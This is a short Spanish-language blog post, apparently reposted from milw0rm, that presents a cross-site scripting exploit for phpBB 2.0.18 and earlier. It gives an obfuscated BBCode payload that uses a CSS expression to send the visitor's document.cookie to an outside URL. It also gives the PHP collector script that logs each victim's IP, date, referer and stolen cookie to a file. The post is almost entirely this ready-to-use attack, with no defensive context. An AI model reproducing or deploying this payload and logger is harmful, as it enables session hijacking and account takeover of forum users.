phpBB <= 2.0.18 XSS Cookie Disclosure
en el phpbb code ponemos:
Código:
< b c = " " > " ''style='font-size:0;color:#EFEFEF'style='top:expression(eval(this.sss));'sss=`i=new/**/Image();i.src='http://www.url.com/cookie/c.php?c='+document.cookie;this.sss=null`style='font-size:0; X="'
donde ¨c.php¨ contiene la siguiente data:
Código:
$cookie = $_GET['c'];
$ip = getenv ('REMOTE_ADDR');
$date=date("m/d/Y g:i:s a");
$referer=getenv ('HTTP_REFERER');
$fl = fopen('log.txt', 'a');
fwrite($fl, "\n".$ip.' :: '.$date."\n".$referer." :: ".$cookie."\n");
fclose($fl);
?>
Fuente:milw0rm
Salu2
publicado por Mousehack a las 6:10 p. m.
0 Comments:
Publicar un comentario
<< Home